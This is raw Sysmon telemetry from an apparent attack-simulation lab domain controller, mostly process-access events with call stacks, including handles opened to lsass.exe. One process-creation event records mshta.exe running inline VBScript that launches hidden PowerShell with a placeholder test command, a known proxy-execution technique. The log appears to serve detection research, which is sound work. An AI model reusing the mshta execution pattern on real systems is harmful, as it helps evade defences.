15:59:46.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027779Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027778Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027777Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027776Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.022{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-536F-6008-7706-00000000A301}5156C:\Windows\System32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027775Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.022{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-536F-6008-7706-00000000A301}5156C:\Windows\System32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027774Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.022{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-536F-6008-7706-00000000A301}5156C:\Windows\System32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028202Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.928{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5373-6008-8106-00000000A301}7892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028201Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.928{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5373-6008-8106-00000000A301}7892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028200Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.881{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5373-6008-8106-00000000A301}7892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028199Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.881{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5373-6008-8106-00000000A301}7892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000028198Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.850{7901BC46-5373-6008-8106-00000000A301}7892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0kdvsdeq.qbl.ps12021-01-20 15:59:47.850 10341000x800000000000000028197Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.834{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5373-6008-8106-00000000A301}7892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028196Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.787{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5373-6008-8206-00000000A301}4644C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028195Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.787{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5373-6008-8206-00000000A301}4644C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028194Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.787{7901BC46-5373-6008-8206-00000000A301}46441324C:\Windows\system32\conhost.exe{7901BC46-5373-6008-8106-00000000A301}7892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028193Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.787{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5373-6008-8206-00000000A301}4644C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028192Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.772{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028191Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.772{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028190Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.772{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028189Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.772{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028188Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.772{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5373-6008-8106-00000000A301}7892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028187Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.772{7901BC46-5373-6008-8006-00000000A301}72246120C:\Windows\System32\mshta.exe{7901BC46-5373-6008-8106-00000000A301}7892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028186Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.786{7901BC46-5373-6008-8106-00000000A301}7892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-5373-6008-8006-00000000A301}7224C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script language="VBScript">Close(Execute("CreateObject(""Wscript.Shell"").Run%20""powershell.exe%20-nop%20-Command%20Write-Host%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%20Start-Sleep%20-Seconds%202;%20exit"",0,true"))</script>'" 10341000x800000000000000028185Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.756{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-5373-6008-8006-00000000A301}7224C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028184Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.756{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-5373-6008-8006-00000000A301}7224C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028183Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.756{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-5373-6008-8006-00000000A301}7224C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028182Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.756{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-5373-6008-8006-00000000A301}7224C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028181Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.740{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5373-6008-8006-00000000A301}7224C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028180Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.740{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5373-6008-8006-00000000A301}7224C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028179Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 